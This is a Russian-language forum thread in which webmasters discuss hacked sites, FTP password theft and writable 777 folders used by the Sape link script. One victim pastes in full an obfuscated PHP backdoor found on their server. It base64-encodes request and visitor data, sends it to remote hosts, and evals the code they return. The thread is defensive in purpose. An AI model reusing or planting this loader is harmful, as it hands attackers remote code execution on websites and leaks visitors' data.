Взломали мой аккаунт - Inkwisitor. Помогите

[Inkwisitor]

Цитата:

Сообщение от Kiparis

Информация к размышлению...
сегодня обнаружил в папке с кодом сапы два файла .htaccess и 134123.php в .htaccess на него ссылка по 404, а в файле какой-то код, по типу вирусного...

У меня было другое. Содержание всех файлов index.php для сайтов исчезло, а вместо него появилась редиректная javascript ссылка, которая неработала. Все остальное осталось нетронуто.

PS. Google этого юмора не оценил и вмиг убрал сайты из поисковой выдачи, и начал всех оповещать что существует возможность заразиться вирусом при посещении сайта. Яндекс даже не заметил

[Kiparis]

Цитата:

Сообщение от Inkwisitor

У меня было другое. Содержание всех файлов index.php для сайтов исчезло, а вместо него появилась редиректная javascript ссылка, которая неработала. Все остальное осталось нетронуто.

это говорит об угоне пароля от фтп, бо корневой каталог должен быть закрыт для редактирования извне, другое дело папка сапы, она открыта полностью (777) !!!

[MadGreen]

открыта для чего? в любом случае в 777 можно писать либо из скрипта на хостинге либо на фтп - ищите дырку в движке (хотя скорее всего просто фтп)

[sergbond]

Цитата:

Сообщение от Kiparis

Информация к размышлению...
сегодня обнаружил в папке с кодом сапы два файла .htaccess и 134123.php в .htaccess на него ссылка по 404, а в файле какой-то код, по типу вирусного...

А чего размышлять? Либо дырка в движке, либо вирус на машине хостера (к примеру на одном из соседних сайтов).

[Kiparis]

Цитата:

Сообщение от sergbond

А чего размышлять? Либо дырка в движке, либо вирус на машине хостера (к примеру на одном из соседних сайтов).

я к тому, что это проявилось только в папке сапы, хоть она была у меня переименована и sape.php тоже переименован...

p.s. Движка как такового нет, сайт самописный на пхп.

[sergbond]

Цитата:

Сообщение от Kiparis

я к тому, что это проявилось только в папке сапы, хоть она была у меня переименована и sape.php тоже переименован...

p.s. Движка как такового нет, сайт самописный на пхп.

Если код пихают в корень или дописывают им существующие файлы - значит ушел налево пароль фтп (трояны/вирусы на машине пользователя)

Если код пихают в папки 777 - значит пишут через апач на ваших скриптах (чаще всего), либо скриптами с соседних аккаунтов.

Самописный сайт на пхп принимает какие-нибудь параметры через GET/POST?

[NCom]

многим бы помогла привязка по ip... вот я бы работал и не боялся. Было бы еще удобно, если бы можно указать 2 ip к примеру. К примеру задаешь ip и подтверждаешь его по смс с указанного телефона, по типу вебманей.

[Kiparis]

Цитата:

Сообщение от sergbond

Если код пихают в корень или дописывают им существующие файлы - значит ушел налево пароль фтп (трояны/вирусы на машине пользователя)

Если код пихают в папки 777 - значит пишут через апач на ваших скриптах (чаще всего), либо скриптами с соседних аккаунтов.

Самописный сайт на пхп принимает какие-нибудь параметры через GET/POST?

пихают только в папку с 777, есть страничка обратной связи, там можно оставить сообщение, но оно модерируется и не выводится без одобрения...


вот что в коде

PHP код:

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);if((include(base64_decode("aHR0cDovLw==").base64_decode("YS5waHB0YWdzLndz")."/?".$str)));else if(include(base64_decode("aHR0cDovLw==").base64_decode("Yi5waHB0YWdzLndz")."/?".$str));else if($c=file_get_contents(base64_decode("aHR0cDovLzcucGhwdGFncy53cy8/").$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLnBocHRhZ3Mud3MvPw==").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>

Добавлено через 17 минут
а лишние параметры в GET/POST режутся!

[sergbond]

Цитата:

Сообщение от Kiparis

пихают только в папку с 777, есть страничка обратной связи, там можно оставить сообщение, но оно модерируется и не выводится без одобрения...
а лишние параметры в GET/POST режутся!

Этого достаточно, чтобы напихать по самое "н е б а л у й", если код дырявый.
Пихать будут НЕ через лишние параметры.

[Kiparis]

Цитата:

Сообщение от sergbond

Этого достаточно, чтобы напихать по самое "н е б а л у й", если код дырявый.

можно поподробнее про дырявый код?